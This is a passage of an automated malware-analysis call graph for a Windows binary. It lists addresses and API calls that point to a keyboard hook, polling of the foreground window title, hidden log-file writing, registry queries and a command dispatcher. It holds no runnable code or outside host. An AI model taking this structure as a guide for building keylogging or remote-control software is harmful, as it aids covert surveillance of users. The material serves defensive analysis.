3091ee9 11 API calls 46302->46305 46306 3091ee9 11 API calls 46303->46306 46307 3091ee9 11 API calls 46304->46307 46305->46274 46306->46274 46308 309c7ba 46307->46308 46309 3091ee9 11 API calls 46308->46309 46310 309c7c3 46309->46310 46311 3091ee9 11 API calls 46310->46311 46312 309c7cc 46311->46312 46312->45821 46313->45832 46314->45846 46315->45850 46317 30a210e RegQueryValueExA RegCloseKey 46316->46317 46318 30a2132 46316->46318 46317->46318 46318->45760 46319->45796 46324 30c22a4 46320->46324 46321 30c9adb new 21 API calls 46321->46324 46322 309db53 46322->45858 46324->46321 46324->46322 47019 30d0480 7 API calls 2 library calls 46324->47019 47020 30c29bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46324->47020 47021 30c301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46324->47021 46327->45888 46328->45876 46329->45735 46332 30a94b0 LoadResource LockResource SizeofResource 46331->46332 46333 309dd9e 46331->46333 46332->46333 46333->45941 46335 309209f 46334->46335 46343 30923ae 46335->46343 46337 30920aa 46347 30924ea 46337->46347 46339 30920b9 46339->45945 46341 3092097 28 API calls 46340->46341 46342 3096302 46341->46342 46342->45952 46344 3092408 46343->46344 46345 30923b8 46343->46345 46344->46337 46345->46344 46354 3092787 11 API calls std::_Deallocate 46345->46354 46348 30924fa 46347->46348 46349 3092515 46348->46349 46350 3092500 46348->46350 46365 30928c8 46349->46365 46355 3092549 46350->46355 46353 3092513 46353->46339 46354->46344 46376 3092868 46355->46376 46357 309255d 46358 3092572 46357->46358 46359 3092587 46357->46359 46381 3092a14 22 API calls 46358->46381 46361 30928c8 28 API calls 46359->46361 46364 3092585 46361->46364 46362 309257b 46382 30929ba 22 API calls 46362->46382 46364->46353 46366 30928d1 46365->46366 46367 30928db 46366->46367 46368 3092933 46366->46368 46371 30928e4 46367->46371 46372 30928f7 46367->46372 46390 3092884 22 API calls 46368->46390 46384 3092c8e 46371->46384 46374 30928f5 46372->46374 46375 30923ae 11 API calls 46372->46375 46374->46353 46375->46374 46378 3092870 46376->46378 46377 3092878 46377->46357 46378->46377 46383 3092c83 22 API calls 46378->46383 46381->46362 46382->46364 46385 3092c98 __EH_prolog 46384->46385 46391 3092e34 22 API calls 46385->46391 46387 30923ae 11 API calls 46389 3092d72 46387->46389 46388 3092d04 46388->46387 46389->46374 46391->46388 46393 30920c7 46392->46393 46394 30923ae 11 API calls 46393->46394 46395 30920d2 46394->46395 46395->45961 46401 309421a 46396->46401 46399->45961 46400->45980 46402 3094223 46401->46402 46403 30923ae 11 API calls 46402->46403 46404 309422e 46403->46404 46405 3092549 28 API calls 46404->46405 46406 3094195 46405->46406 46406->45961 46407->45984 46408->45988 46409->45990 46410->45995 46413 309328a 46411->46413 46412 30932a9 46412->46000 46413->46412 46414 30928c8 28 API calls 46413->46414 46414->46412 46416 30951db 46415->46416 46425 3095254 46416->46425 46418 30951e8 46418->46003 46420 3092041 46419->46420 46421 30923ae 11 API calls 46420->46421 46422 309205b 46421->46422 46447 309265a 46422->46447 46426 3095262 46425->46426 46427 3095268 46426->46427 46428 309527e 46426->46428 46436 30925d0 46427->46436 46430 30952d5 46428->46430 46431 3095296 46428->46431 46445 3092884 22 API calls 46430->46445 46434 30928c8 28 API calls 46431->46434 46435 309527c 46431->46435 46434->46435 46435->46418 46437 3092868 22 API calls 46436->46437 46438 30925e2 46437->46438 46439 3092609 46438->46439 46440 3092652 46438->46440 46443 30928c8 28 API calls 46439->46443 46444 309261b 46439->46444 46446 3092884 22 API calls 46440->46446 46443->46444 46444->46435 46448 309266b 46447->46448 46449 30923ae 11 API calls 46448->46449 46450 309206d 46449->46450 46450->46006 46451->46014 46452->46020 46454 30a9f30 GetCurrentProcess 46453->46454 46455 30a92bc 46453->46455 46454->46455 46456 30a1f91 RegOpenKeyExA 46455->46456 46457 30a1fbf RegQueryValueExA RegCloseKey 46456->46457 46458 30a1fe9 46456->46458 46457->46458 46459 3092073 28 API calls 46458->46459 46460 30a1ffe 46459->46460 46460->46027 46461->46035 46463 30924d9 46462->46463 46464 30924ea 28 API calls 46463->46464 46465 3092091 46464->46465 46465->45776 46482 30c97c5 46466->46482 46468 30c8c0b 46488 30c8557 35 API calls 2 library calls 46468->46488 46470 30c8be5 46487 30cad91 20 API calls _free 46470->46487 46471 30c8bd0 46471->46468 46471->46470 46481 30c8bea pre_c_initialization 46471->46481 46474 30c8c17 46476 30c8c46 46474->46476 46489 30c980a 39 API calls __Toupper 46474->46489 46478 30c8cb2 46476->46478 46490 30c9771 20 API calls 2 library calls 46476->46490 46491 30c9771 20 API calls 2 library calls 46478->46491 46479 30c8d79 _strftime 46479->46481 46492 30cad91 20 API calls _free 46479->46492 46481->46064 46483 30c97dd 46482->46483 46484 30c97ca 46482->46484 46483->46471 46493 30cad91 20 API calls _free 46484->46493 46486 30c97cf pre_c_initialization 46486->46471 46487->46481 46488->46474 46489->46474 46490->46478 46491->46479 46492->46481 46493->46486 46500 3091f90 46494->46500 46496 3092efe 46497 3092035 11 API calls 46496->46497 46498 3092f0d 46497->46498 46498->46078 46499->46081 46501 30925d0 28 API calls 46500->46501 46502 3091f9d 46501->46502 46502->46496 46504 3091f6e 46503->46504 46542 3092232 46504->46542 46506 3091f79 46506->46091 46508 30980ae 46507->46508 46509 3092232 11 API calls 46508->46509 46510 30980c8 46509->46510 46547 3094247 46510->46547 46512 30980d6 46513 3099203 46512->46513 46560 309a83c 46513->46560 46516 309922f 46519 3092073 28 API calls 46516->46519 46517 3099257 46518 3092073 28 API calls 46517->46518 46520 3099262 46518->46520 46521 3099239 46519->46521 46522 3092073 28 API calls 46520->46522 46564 30a9bca 28 API calls 46521->46564 46524 3099271 46522->46524 46526 30a94da 79 API calls 46524->46526 46525 3099247 46565 309a0b0 31 API calls new 46525->46565 46528 3099276 CreateThread 46526->46528 46531 309929d CreateThread 46528->46531 46532 3099291 CreateThread 46528->46532 46573 3099305 46528->46573 46529 309924e 46530 3091fb8 11 API calls 46529->46530 46530->46517 46533 3091ee9 11 API calls 46531->46533 46570 3099311 46531->46570 46532->46531 46567 30992ef 46532->46567 46534 30992b1 46533->46534 46534->46113 46535->46107 46697 3093202 46536->46697 46538 3093002 46701 3093242 46538->46701 46541->46124 46725 30992fb 159 API calls 46541->46725 46543 309228c 46542->46543 46544 309223c 46542->46544 46543->46506 46544->46543 46546 3092759 11 API calls std::_Deallocate 46544->46546 46546->46543 46548 3092868 22 API calls 46547->46548 46549 309425b 46548->46549 46550 3094270 46549->46550 46551 3094285 46549->46551 46557 30942bf 22 API calls 46550->46557 46559 30927c6 28 API calls 46551->46559 46554 3094279 46558 3092c28 22 API calls 46554->46558 46556 3094283 46556->46512 46557->46554 46558->46556 46559->46556 46561 3099221 46560->46561 46562 309a845 46560->46562 46561->46516 46561->46517 46566 309a8bc 28 API calls 46562->46566 46564->46525 46565->46529 46566->46561 46576 3099340 46567->46576 46605 3099c1f 46570->46605 46650 309971e 46573->46650 46577 3099359 GetModuleHandleA SetWindowsHookExA 46576->46577 46578 30993bb GetMessageA 46576->46578 46577->46578 46580 3099375 GetLastError 46577->46580 46579 30993cd TranslateMessage DispatchMessageA 46578->46579 46581 30992f8 46578->46581 46579->46578 46579->46581 46591 30a9b16 46580->46591 46584 30952dd 28 API calls 46585 3099396 46584->46585 46586 3092073 28 API calls 46585->46586 46587 30993a5 46586->46587 46588 30a94da 79 API calls 46587->46588 46589 30993aa 46588->46589 46590 3091fb8 11 API calls 46589->46590 46590->46581 46596 30cf34f 46591->46596 46594 3092073 28 API calls 46595 3099386 46594->46595 46595->46584 46597 30cf35b 46596->46597 46600 30cf14b 46597->46600 46599 30a9b3a 46599->46594 46601 30cf162 46600->46601 46603 30cf199 pre_c_initialization 46601->46603 46604 30cad91 20 API calls _free 46601->46604 46603->46599 46604->46603 46612 3099c2d 46605->46612 46606 3099c87 Sleep GetForegroundWindow GetWindowTextLengthW 46635 309a854 46606->46635 46607 309931a 46610 3091f66 11 API calls 46610->46612 46612->46606 46612->46607 46612->46610 46614 30a9ac6 GetTickCount 46612->46614 46615 3099ccd GetWindowTextW 46612->46615 46617 3099e25 46612->46617 46618 309a83c 28 API calls 46612->46618 46620 3099d92 Sleep 46612->46620 46621 30cf34f 20 API calls 46612->46621 46623 3092073 28 API calls 46612->46623 46625 30952dd 28 API calls 46612->46625 46627 3092ff4 28 API calls 46612->46627 46628 3098209 28 API calls 46612->46628 46630 3099d1a 46612->46630 46632 3091ee9 11 API calls 46612->46632 46633 309962e 12 API calls 46612->46633 46634 3091fb8 11 API calls 46612->46634 46641 30c219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46612->46641 46642 30c2525 23 API calls __onexit 46612->46642 46643 30c215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 46612->46643 46644 3098080 28 API calls 46612->46644 46646 309a8cc 28 API calls 46612->46646 46647 309a694 40 API calls 2 library calls 46612->46647 46648 30a9bca 28 API calls 46612->46648 46614->46612 46615->46612 46619 3091ee9 11 API calls 46617->46619 46618->46612 46619->46607 46620->46612 46621->46612 46623->46612 46625->46612 46626 3098098 28 API calls 46626->46630 46627->46612 46628->46612 46630->46612 46630->46626 46645 309a0b0 31 API calls new 46630->46645 46632->46612 46633->46612 46634->46612 46636 309a85c 46635->46636 46637 3092232 11 API calls 46636->46637 46638 309a867 46637->46638 46649 309a87c 28 API calls 46638->46649 46640 309a876 46640->46612 46642->46612 46643->46612 46644->46612 46645->46630 46646->46612 46647->46612 46648->46612 46649->46640 46651 3099733 Sleep 46650->46651 46671 309966d 46651->46671 46653 309930e 46654 3099773 CreateDirectoryW 46659 3099745 46654->46659 46655 3099784 GetFileAttributesW 46655->46659 46656 309979b SetFileAttributesW 46656->46659 46657 30920bf 11 API calls 46669 30997e6 46657->46669 46659->46651 46659->46653 46659->46654 46659->46655 46659->46656 46661 3091e45 28 API calls 46659->46661 46659->46669 46684 30aa17b 46659->46684 46660 3099815 PathFileExistsW 46660->46669 46661->46659 46663 3092097 28 API calls 46663->46669 46664 309991e SetFileAttributesW 46664->46659 46665 3091fb8 11 API calls 46665->46669 46666 30962ee 28 API calls 46666->46669 46667 3091fc2 28 API calls 46667->46669 46669->46657 46669->46660 46669->46663 46669->46664 46669->46665 46669->46666 46669->46667 46670 3091fb8 11 API calls 46669->46670 46694 30aa20f 32 API calls 46669->46694 46695 30aa27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 46669->46695 46670->46659 46672 309971a 46671->46672 46674 3099683 46671->46674 46672->46659 46673 30996a2 CreateFileW 46673->46674 46675 30996b0 GetFileSize 46673->46675 46674->46673 46676 30996e5 CloseHandle 46674->46676 46677 30996f7 46674->46677 46678 30996da Sleep 46674->46678 46679 30996d3 46674->46679 46675->46674 46675->46676 46676->46674 46677->46672 46681 3098098 28 API calls 46677->46681 46678->46676 46696 309a025 83 API calls 46679->46696 46682 3099713 46681->46682 46683 3099203 123 API calls 46682->46683 46683->46672 46685 30aa18e CreateFileW 46684->46685 46687 30aa1cb 46685->46687 46688 30aa1c7 46685->46688 46689 30aa1eb WriteFile 46687->46689 46690 30aa1d2 SetFilePointer 46687->46690 46688->46659 46692 30aa1fe 46689->46692 46693 30aa200 CloseHandle 46689->46693 46690->46689 46691 30aa1e2 CloseHandle 46690->46691 46691->46688 46692->46693 46693->46688 46694->46669 46695->46669 46696->46678 46698 309320e 46697->46698 46707 30935f8 46698->46707 46700 309321b 46700->46538 46702 309324e 46701->46702 46703 3092232 11 API calls 46702->46703 46704 3093268 46703->46704 46721 3092316 46704->46721 46708 3093606 46707->46708 46709 309360c 46708->46709 46710 3093624 46708->46710 46718 3093686 28 API calls 46709->46718 46712 309363c 46710->46712 46713 309367e 46710->46713 46717 3093622 46712->46717 46719 30927c6 28 API calls 46712->46719 46720 3092884 22 API calls 46713->46720 46717->46700 46718->46717 46719->46717 46722 3092327 46721->46722 46723 3092232 11 API calls 46722->46723 46724 30923a7 46723->46724 46724->46119 46727 3094166 46726->46727 46728 3092232 11 API calls 46727->46728 46729 3094171 46728->46729 46737 309419c 46729->46737 46732 30942dc 46749 3094333 46732->46749 46734 30942ea 46735 3093242 11 API calls 46734->46735 46736 30942f9 46735->46736 46736->46131 46738 30941a8 46737->46738 46741 30941b9 46738->46741 46740 309417c 46740->46732 46742 30941c9 46741->46742 46743 30941cf 46742->46743 46744 30941e6 46742->46744 46746 3094247 28 API calls 46743->46746 46748 30927c6 28 API calls 46744->46748 46747 30941e4 46746->46747 46747->46740 46748->46747 46750 309433f 46749->46750 46753 3094351 46750->46753 46752 309434d 46752->46734 46754 309435f 46753->46754 46755 309437e 46754->46755 46756 3094365 46754->46756 46757 3092868 22 API calls 46755->46757 46816 30934c6 28 API calls 46756->46816 46758 3094386 46757->46758 46760 30943f9 46758->46760 46761 309439f 46758->46761 46818 3092884 22 API calls 46760->46818 46772 309437c 46761->46772 46817 30927c6 28 API calls 46761->46817 46772->46752 46816->46772 46817->46772 46819->46145 46821 309534b 46820->46821 46824 3095362 46821->46824 46823 3095359 46823->46151 46825 3095370 46824->46825 46826 309538d 46825->46826 46827 3095376 46825->46827 46828 3092868 22 API calls 46826->46828 46837 3093830 28 API calls 46827->46837 46829 3095395 46828->46829 46831 30953ae 46829->46831 46832 3095407 46829->46832 46834 30928c8 28 API calls 46831->46834 46836 309538b 46831->46836 46838 3092884 22 API calls 46832->46838 46834->46836 46836->46823 46837->46836 46840 30a98da _Yarn ___scrt_fastfail 46839->46840 46841 3092073 28 API calls 46840->46841 46842 30a399f 46841->46842 46842->46159 46844 30a3958 WSASetLastError 46843->46844 46845 30a394e 46843->46845 46844->46185 46961 30a37dc 29 API calls ___std_exception_copy 46845->46961 46847 30a3953 46847->46844 46850 3094f4e 46849->46850 46851 3094f45 46849->46851 46850->46185 46851->46850 46852 30a9b16 28 API calls 46851->46852 46853 3094f71 46852->46853 46854 30952dd 28 API calls 46853->46854 46855 3094f81 46854->46855 46856 3092073 28 API calls 46855->46856 46857 3094f90 46856->46857 46858 30a94da 79 API calls 46857->46858 46859 3094f95 46858->46859 46860 3091fb8 11 API calls 46859->46860 46860->46850 46862 30948c6 46861->46862 46863 30948ce 46862->46863 46867 30949fb 46862->46867 46864 30952fe 28 API calls 46863->46864 46881 3094903 46863->46881 46911 309495e 46863->46911 46866 30948ef 46864->46866 46869 3092073 28 API calls 46866->46869 46870 3094912 46867->46870 46871 3094a16 46867->46871 46867->46911 46868 309490b 46868->46870 46872 3094921 46868->46872 46873 30948fe 46869->46873 46875 3092073 28 API calls 46870->46875 46967 30aa86b 30 API calls 46871->46967 46878 3094930 46872->46878 46879 3094967 46872->46879 46876 30a94da 79 API calls 46873->46876 46880 3094a60 46875->46880 46876->46881 46877 3094a20 46882 30952dd 28 API calls 46877->46882 46883 3092073 28 API calls 46878->46883 46964 30af7f5 54 API calls 46879->46964 46884 3092073 28 API calls 46880->46884 46962 30aea15 27 API calls 46881->46962 46886 3094a30 46882->46886 46888 309493f 46883->46888 46889 3094a6f 46884->46889 46887 3092073 28 API calls 46886->46887 46891 3094a3f 46887->46891 46892 3092073 28 API calls 46888->46892 46893 30a94da 79 API calls 46889->46893 46890 309496f 46894 30949a4 46890->46894 46895 3094974 46890->46895 46897 30a94da 79 API calls 46891->46897 46898 309494e 46892->46898 46893->46911 46966 30aebbb 28 API calls 46894->46966 46896 3092073 28 API calls 46895->46896 46900 3094983 46896->46900 46901 3094a44 46897->46901 46902 30a94da 79 API calls 46898->46902 46904 3092073 28 API calls 46900->46904 46905 3091fb8 11 API calls 46901->46905 46906 3094953 46902->46906 46903 30949ac 46907 30949d9 CreateEventW 46903->46907 46909 3092073 28 API calls 46903->46909 46908 3094992 46904->46908 46905->46911 46963 30ac4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46906->46963 46907->46911 46910 30a94da 79 API calls 46908->46910 46913 30949c2 46909->46913 46914 3094997 46910->46914 46911->46185 46915 3092073 28 API calls 46913->46915 46965 30aee67 52 API calls 46914->46965 46917 30949d1 46915->46917 46918 30a94da 79 API calls 46917->46918 46919 30949d6 46918->46919 46919->46907 46968 30a9797 GlobalMemoryStatusEx 46920->46968 46922 30a97d6 46922->46185 46969 30a2fd6 46923->46969 46927 30a9adc GetTickCount 46926->46927 46927->46185 46929 30c4c30 ___scrt_fastfail 46928->46929 46930 30a9a98 GetForegroundWindow GetWindowTextW 46929->46930 46931 309415e 28 API calls 46930->46931 46932 30a9abe 46931->46932 46932->46185 46934 3092073 28 API calls 46933->46934 46935 309e2e0 46934->46935 46935->46185 46936->46185 46937->46185 46938->46185 46940 30920bf 11 API calls 46939->46940 46941 3094c07 46940->46941 46942 30920bf 11 API calls 46941->46942 46944 3094c10 46942->46944 46943 30c9adb new 21 API calls 46943->46944 46944->46943 46946 3092097 28 API calls 46944->46946 46947 3094c81 46944->46947 46948 3091fc2 28 API calls 46944->46948 46951 3091fb8 11 API calls 46944->46951 46999 3094b76 54 API calls 46944->46999 47000 3094ca3 46944->47000 46946->46944 47012 3094e06 87 API calls 46947->47012 46948->46944 46950 3094c88 46952 3091fb8 11 API calls 46950->46952 46951->46944 46953 3094c91 46952->46953 46954 3091fb8 11 API calls 46953->46954 46955 3094c9a 46954->46955 46955->46185 46957->46185 46958->46185 46959->46185 46960->46185 46961->46847 46962->46868 46963->46911 46964->46890 46965->46906 46966->46903 46967->46877 46968->46922 46972 30a2fa9 46969->46972 46973 30a2fbe ___scrt_initialize_default_local_stdio_options 46972->46973 46976 30ceea0 46973->46976 46979 30cc3e3 46976->46979 46980 30cc40b 46979->46980 46981 30cc423 46979->46981 46994 30cad91 20 API calls _free 46980->46994 46981->46980 46983 30cc42b 46981->46983 46995 30c8557 35 API calls 2 library calls 46983->46995 46985 30cc43b 46996 30ccb38 20 API calls 2 library calls 46985->46996 46986 30cc410 pre_c_initialization 46988 30c2d4b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 46986->46988 46990 30a2fcc 46988->46990 46989 30cc4b3 46997 30cd0e9 50 API calls 3 library calls 46989->46997 46990->46185 46993 30cc4be 46998 30ccba2 20 API calls _free 46993->46998 46994->46986 46995->46985 46996->46989 46997->46993 46998->46986 46999->46944 47001 30920bf 11 API calls 47000->47001 47005 3094cbe 47001->47005 47002 3094df3 47003 3091fb8 11 API calls 47002->47003 47004 3094dfc 47003->47004 47004->46944 47005->47002 47006 3091fb8 11 API calls 47005->47006 47007 3091fc2 28 API calls 47005->47007 47008 30920d6 28 API calls 47005->47008 47009 3091fa0 28 API calls 47005->47009 47010 3094182 28 API calls 47005->47010 47011 3094db8 CloseHandle 47005->47011 47006->47005 47007->47005 47008->47005 47009->47005 47010->47005 47011->47005 47012->46950 47013->46266 47014->46292 47015->46291 47016->46280 47017->46284 47018->46290 47019->46324 47024 309e1a8 47022->47024 47023 30a1f34 3 API calls 47023->47024 47024->47023 47025 309e1da 47024->47025 47026 309e24e 47024->47026 47028 309e23e Sleep 47024->47028 47027 3098098 28 API calls 47025->47027 47025->47028 47037 3091ee9 11 API calls 47025->47037 47040 3092073 28 API calls 47025->47040 47044 30a215f 14 API calls 47025->47044 47054 309bc59 108 API calls ___scrt_fastfail 47025->47054 47055 30a9bca 28 API calls 47025->47055 47056 30a2204 14 API calls 47025->47056 47029 3098098 28 API calls 47026->47029 47027->47025 47028->47024 47032 309e25b 47029->47032 47057 30a9bca 28 API calls 47032->47057 47034 309e267 47058 30a2204 14 API calls 47034->47058 47037->47025 47038 309e27a 47039 3091ee9 11 API calls 47038->47039 47041 309e286 47039->47041 47040->47025 47042 3092073 28 API calls 47041->47042 47043 309e297 47042->47043 47045 30a215f 14 API calls 47043->47045 47044->47025 47046 309e2aa 47045->47046 47059 30a12b5 TerminateProcess WaitForSingleObject 47046->47059 47048 309e2b2 ExitProcess 47060 30a1253 59 API calls 47050->47060 47055->47025 47056->47025 47057->47034 47058->47038 47059->47048 47061 30a44da 47062 30920d6 28 API calls 47061->47062 47063 30a44f9 SetEvent 47062->47063 47064 30a450e 47063->47064 47065 3094182 28 API calls 47064->47065 47066 30a4528 47065->47066 47067 30920d6 28 API calls 47066->47067 47068 30a4538 47067->47068 47069 30920d6 28 API calls 47068->47069 47070 30a454a 47069->47070 47071 30a9d87 28 API calls 47070->47071 47072 30a4553 47071->47072 47073 30a4563 47072->47073 47074 30a5281 47072->47074 47075 30a5188 47073->47075 47076 30a4569 47073->47076 47077 30a53ca 47074->47077 47078 30a548f 47074->47078 47079 30a558f 47074->47079 47080 30a55ad 47074->47080 47081 30a52c1 47074->47081 47082 30a52e6 47074->47082 47083 30a54e6 47074->47083 47084 30a5506 47074->47084 47085 30a5599 47074->47085 47086 30a529e 47074->47086 47087 30a535f 47074->47087 47088 30a555d 47074->47088 47089 30a5412 47074->47089 47090 30a5432 47074->47090 47091 30a5452 47074->47091 47092 30a5510 47074->47092 47093 30a55f5 47074->47093 47172 30a46cf 47074->47172 47318 30a57e1 11 API calls 47075->47318 47116 30a457c GetTickCount 47076->47116 47076->47172 47306 30a46f2 47076->47306 47105 3091e45 28 API calls 47077->47105 47109 3091e45 28 API calls 47078->47109 47336 30a8ccd 102 API calls 47079->47336 47338 30966a6 58 API calls 47080->47338 47113 3091e45 28 API calls 47081->47113 47098 3091e45 28 API calls 47082->47098 47100 3091e45 28 API calls 47083->47100 47333 30a8e33 100 API calls 47084->47333 47337 30a8dec 58 API calls 47085->47337 47110 3091e45 28 API calls 47086->47110 47326 3097ba0 11 API calls 47087->47326 47111 3091e45 28 API calls 47088->47111 47114 3091e45 28 API calls 47089->47114 47097 3091e45 28 API calls 47090->47097 47103 3091e45 28 API calls 47091->47103 47106 30a5519 47092->47106 47107 30a553e ShowWindow SetForegroundWindow 47092->47107 47339 3095b0b 48 API calls 47093->47339 47094 3091e6d 11 API calls 47099 30a565d 47094->47099 47118 30a543d 47097->47118 47119 30a52f1 47098->47119 47126 3091fb8 11 API calls 47099->47126 47127 30a54f1 47100->47127 47102 30a5194 47121 3091e45 28 API calls 47102->47121 47122 30a545f 47103->47122 47128 30a53e5 47105->47128 47334 30aaa4f 81 API calls ___scrt_fastfail 47106->47334 47107->47172 47124 30a549b 47109->47124 47130 30a52a9 47110->47130 47131 30a556a 47111->47131 47132 30a52cc 47113->47132 47133 30a541d 47114->47133 47117 30a9b16 28 API calls 47116->47117 47134 30a458d 47117->47134 47136 30920d6 28 API calls 47118->47136 47148 30a52f8 StrToIntA 47119->47148 47120 30a55b2 47139 3091e45 28 API calls 47120->47139 47140 30a519f 47121->47140 47162 3092073 28 API calls 47122->47162 47123 30a55fe 47142 3091e45 28 API calls 47123->47142 47165 30a54b0 47124->47165 47166 30a54c7 47124->47166 47125 30a536b 47144 3091e45 28 API calls 47125->47144 47137 30a5669 47126->47137 47138 30920d6 28 API calls 47127->47138 47163 3091e45 28 API calls 47128->47163 47143 30920d6 28 API calls 47130->47143 47168 3091e45 28 API calls 47131->47168 47170 30c9867 _strftime 39 API calls 47132->47170 47145 30920d6 28 API calls 47133->47145 47146 30a9ac6 GetTickCount 47134->47146 47147 30a5448 47136->47147 47152 3091fb8 11 API calls 47137->47152 47153 30a54fc 47138->47153 47149 30a55bf 47139->47149 47176 30c9867 _strftime 39 API calls 47140->47176 47141 30a5520 CreateThread 47141->47172 47342 30ab212 10 API calls 47141->47342 47150 30a5609 47142->47150 47154 30a52b4 47143->47154 47151 30a5376 47144->47151 47155 30a5428 47145->47155 47156 30a4599 47146->47156 47330 3093f08 100 API calls 47147->47330 47158 3091e45 28 API calls 47148->47158 47161 30a9b16 28 API calls 47149->47161 47164 3091e45 28 API calls 47150->47164 47169 30920d6 28 API calls 47151->47169 47159 30a5675 47152->47159 47332 30a59ba 106 API calls 47153->47332 47154->47172 47322 3096bda 100 API calls 47154->47322 47329 30a7a63 100 API calls 47155->47329 47173 30a9b16 28 API calls 47156->47173 47174 30a530c 47158->47174 47175 30a55d5 47161->47175 47177 30a5471 47162->47177 47183 30a53f8 47163->47183 47178 30a5616 47164->47178 47179 3091e45 28 API calls 47165->47179 47181 3091e45 28 API calls 47166->47181 47184 30a5581 47168->47184 47180 30a5381 47169->47180 47185 30a52d9 47170->47185 47172->47094 47187 30a45a4 47173->47187 47205 309c5ed 31 API calls 47174->47205 47188 3092ef0 28 API calls 47175->47188 47189 30a51ac 47176->47189 47208 30a215f 14 API calls 47177->47208 47340 3092f11 28 API calls 47178->47340 47191 30a54b5 47179->47191 47193 3091e45 28 API calls 47180->47193 47194 30a54cc 47181->47194 47182 30a5501 47209 30c9867 _strftime 39 API calls 47183->47209 47335 30a8dcb 28 API calls 47184->47335 47323 3098a88 28 API calls 47185->47323 47195 30a9a77 30 API calls 47187->47195 47196 30a55e0 47188->47196 47319 30a5ceb 28 API calls 47189->47319 47199 30920d6 28 API calls 47191->47199 47200 30a538c 47193->47200 47201 30920d6 28 API calls 47194->47201 47204 30a45b2 47195->47204 47206 3092ef0 28 API calls 47196->47206 47198 30a5621 47210 3092ef0 28 API calls 47198->47210 47203 30a54c0 47199->47203 47202 30920d6 28 API calls 47200->47202 47201->47203 47215 30a5397 47202->47215 47331 30a57f2 102 API calls 47203->47331 47307 30a9c8a 47204->47307 47212 30a531f 47205->47212 47213 30a55ea 47206->47213 47207 30a51c6 47222 3091e45 28 API calls 47207->47222 47208->47172 47216 30a5405 SetWindowTextW 47209->47216 47214 30a562d 47210->47214 47227 3091e45 28 API calls 47212->47227 47213->47093 47341 3095e74 99 API calls 47214->47341 47217 3091e45 28 API calls 47215->47217 47216->47089 47224 30a53a2 47217->47224 47221 3091e45 28 API calls 47226 30a45ce 47221->47226 47228 30a51d9 47222->47228 47223 30a5639 47229 3091fb8 11 API calls 47223->47229 47225 30920d6 28 API calls 47224->47225 47234 30a53ad 47225->47234 47311 3092f11 28 API calls 47226->47311 47231 30a5336 47227->47231 47232 30920d6 28 API calls 47228->47232 47233 30a5642 47229->47233 47324 30aa27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47231->47324 47240 30a51e4 47232->47240 47235 30a564b 47233->47235 47236 3091fb8 11 API calls 47233->47236 47327 309631d 100 API calls 47234->47327 47235->47172 47246 3091fb8 11 API calls 47235->47246 47236->47235 47238 30a45dc 47312 3092e81 28 API calls 47238->47312 47243 3091e45 28 API calls 47240->47243 47242 30a533f 47325 30aa76c 32 API calls 47242->47325 47248 30a51ef 47243->47248 47244 30a53b9 47328 3097bae 87 API calls 47244->47328 47246->47172 47247 30a45eb 47249 3092ef0 28 API calls 47247->47249 47250 30920d6 28 API calls 47248->47250 47251 30a45fa 47249->47251 47253 30a51fa 47250->47253 47313 3092e81 28 API calls 47251->47313 47256 3091e45 28 API calls 47253->47256 47255 30a5351 47260 3091ee9 11 API calls 47255->47260 47258 30a5205 47256->47258 47257 30a4609 47259 3092ef0 28 API calls 47257->47259 47263 309415e 28 API calls 47258->47263 47261 30a4615 47259->47261 47260->47172 47314 3092e81 28 API calls 47261->47314 47265 30a5217 47263->47265 47264 30a461f 47315 3094a81 58 API calls _Yarn 47264->47315 47267 3091e45 28 API calls 47265->47267 47268 30a5222 47267->47268 47273 309415e 28 API calls 47268->47273 47269 30a462e 47270 3091fb8 11 API calls 47269->47270 47271 30a4637 47270->47271 47272 3091fb8 11 API calls 47271->47272 47275 30a4643 47272->47275 47274 30a5234 47273->47274 47320 309838e 107 API calls 2 library calls 47274->47320 47276 3091fb8 11 API calls 47275->47276 47278 30a464f 47276->47278 47279 3091fb8 11 API calls 47278->47279 47280 30a465b 47279->47280 47282 3091fb8 11 API calls 47280->47282 47285 30a4667 47282->47285 47283 30a5240 47321 3098ae3 87 API calls 47283->47321 47284 30a46c2 47284->47172 47286 3091fb8 11 API calls 47285->47286 47287 30a4673 47286->47287 47288 3091ee9 11 API calls 47287->47288 47289 30a467f 47288->47289 47290 3091fb8 11 API calls 47289->47290 47291 30a4688 47290->47291 47292 3091fb8 11 API calls 47291->47292 47293 30a4691 47292->47293 47294 3091e45 28 API calls 47293->47294 47295 30a469c 47294->47295 47296 30c9867 _strftime 39 API calls 47295->47296 47297 30a46a9 47296->47297 47298 30a46ae 47297->47298 47299 30a46d4 47297->47299 47302 30a46bc 47298->47302 47303 30a46c7 47298->47303 47300 3091e45 28 API calls 47299->47300 47301 30a46de 47300->47301 47301->47172 47301->47306 47316 3094fd4 81 API calls 47302->47316 47305 3094f31 79 API calls 47303->47305 47305->47172 47317 30950c4 83 API calls 47306->47317 47308 30a9c97 47307->47308 47309 3092097 28 API calls 47308->47309 47310 30a45c0 47309->47310 47310->47221 47311->47238 47312->47247 47313->47257 47314->47264 47315->47269 47316->47284 47317->47284 47318->47102 47319->47207 47320->47283 47321->47284 47322->47172 47323->47172 47324->47242 47325->47255 47326->47125 47327->47244 47328->47172 47331->47172 47332->47182 47333->47172 47334->47141 47335->47172 47336->47284 47337->47172 47338->47120 47339->47123 47340->47198 47341->47223 47343 30d0c2e 47344 30d0c37 47343->47344 47349 30d0c50 47343->47349 47345 30d0c3f 47344->47345 47350 30d0c8c 47344->47350 47347 30d0c47 47347->47345 47363 30d0f33 22 API calls 2 library calls 47347->47363 47351 30d0c98 47350->47351 47352 30d0c95 47350->47352 47353 30dc239 48 API calls 47351->47353 47352->47347 47354 30d0c9f 47353->47354 47364 30dc53a GetEnvironmentStringsW 47354->47364 47357 30d0caa 47359 30d3c92 _free 20 API calls 47357->47359 47360 30d0cdf 47359->47360 47360->47347 47361 30d0cb5 47377 30d3c92 47361->47377 47363->47349 47365 30dc551 47364->47365 47375 30dc5a4 47364->47375 47366 30dc557 WideCharToMultiByte 47365->47366 47369 30dc573 47366->47369 